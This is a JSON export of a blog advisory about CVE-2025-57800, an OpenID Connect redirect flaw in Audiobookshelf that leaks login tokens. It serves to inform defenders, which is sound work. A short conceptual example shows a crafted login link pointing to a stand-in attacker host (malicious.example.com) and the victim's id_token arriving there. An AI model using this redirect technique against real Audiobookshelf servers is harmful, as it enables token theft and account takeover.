{"id":69783,"date":"2025-09-01T04:16:11","date_gmt":"2025-09-01T04:16:11","guid":{"rendered":""},"modified":"2025-09-06T17:55:49","modified_gmt":"2025-09-06T23:55:49","slug":"cve-2025-57800-openid-connect-authentication-bypass-in-audiobookshelf","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-57800-openid-connect-authentication-bypass-in-audiobookshelf\/","title":{"rendered":"<strong>CVE-2025-57800: OpenID Connect Authentication Bypass in Audiobookshelf<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>The world of cybersecurity is constantly evolving. One of the latest vulnerabilities to be exposed is CVE-2025-57800, a critical vulnerability that affects the Audiobookshelf application. This vulnerability, if exploited, can <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-42950-sap-landscape-transformation-vulnerability-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"77603\">lead to serious consequences including system<\/a> compromise and data leakage. Given the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-54952-severe-integer-overflow-vulnerability-in-executorch-models\/\"  data-wpil-monitor-id=\"78414\">severity of this vulnerability<\/a> and the widespread use of the Audiobookshelf, this issue warrants urgent attention and immediate action.<br \/>\nThis <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-8088-path-traversal-vulnerability-in-windows-version-of-winrar\/\"  data-wpil-monitor-id=\"78683\">vulnerability specifically affects the Audiobookshelf versions<\/a> from 2.6.0 to 2.26.3 when using OpenID Connect (OIDC) for authentication. It&#8217;s important to note that no Identity Provider (IdP) <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-44658-serious-php-fpm-misconfiguration-vulnerability-in-netgear-rax30\/\"  data-wpil-monitor-id=\"78869\">misconfiguration is required for this vulnerability<\/a> to be exploited, meaning any implementation of Audiobookshelf that uses OIDC could be at risk.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-57800<br \/>\nSeverity: High (8.8 CVSS Score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: Required<br \/>\nImpact: <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-50160-heap-based-buffer-overflow-in-windows-rras-posing-system-compromise-risk\/\"  data-wpil-monitor-id=\"78509\">System compromise<\/a> and data leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-2414341049\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>Audiobookshelf | 2.6.0 &#8211; 2.26.3<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The exploit operates by manipulating the redirect callback URLs during the OIDC authentication process. The attacker crafts a malicious login link that, once clicked by the unsuspecting user, prompts Audiobookshelf to store an arbitrary callback in a cookie. This callback is later used to redirect the user post-authentication.<br \/>\nThe <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-24999-critical-sql-server-access-control-vulnerability\/\"  data-wpil-monitor-id=\"79622\">server then issues a 302 redirect to the attacker&#8217;s controlled<\/a> URL, appending sensitive OIDC tokens as query parameters. This allows the attacker to intercept the victim&#8217;s tokens, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-8939-buffer-overflow-vulnerability-in-tenda-ac20-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"78307\">potentially leading<\/a> to a full account takeover. If the victim happens to be an administrator, the attacker could create persistent admin users, thereby amplifying the damage.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-139361862\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Here&#8217;s a simplified conceptual example to illustrate how this exploit might work. Let&#8217;s assume that the attacker has crafted a malicious login link:<\/p>\n<pre><code class=\"\" data-line=\"\">GET \/login?redirect=https:\/\/malicious.example.com\/callback HTTP\/1.1\nHost: vulnerable-audiobookshelf.com<\/code><\/pre>\n<p>The victim clicks the link and logs in, unaware that they are being redirected to an attacker-controlled site:<\/p>\n<pre><code class=\"\" data-line=\"\">GET \/callback?id_token=eyJhbG... HTTP\/1.1\nHost: malicious.example.com<\/code><\/pre>\n<p>The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-25268-unauthenticated-adjacent-attacker-accessing-api-endpoint\/\"  data-wpil-monitor-id=\"77692\">attacker now has access<\/a> to the victim&#8217;s tokens, which opens up a host of damaging possibilities, including account takeover and data theft.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview The world of cybersecurity is constantly evolving. One of the latest vulnerabilities to be exposed is CVE-2025-57800, a critical vulnerability that affects the Audiobookshelf application. This vulnerability, if exploited, can lead to serious consequences including system compromise and data leakage. Given the severity of this vulnerability and the widespread use of the Audiobookshelf, this [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[75],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-69783","post","type-post","status-publish","format-standard","hentry","category-uncategorized","attack_vector-authentication-bypass"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/69783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=69783"}],"version-history":[{"count":8,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/69783\/revisions"}],"predecessor-version":[{"id":72053,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/69783\/revisions\/72053"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=69783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=69783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=69783"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=69783"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=69783"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=69783"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=69783"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=69783"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=69783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}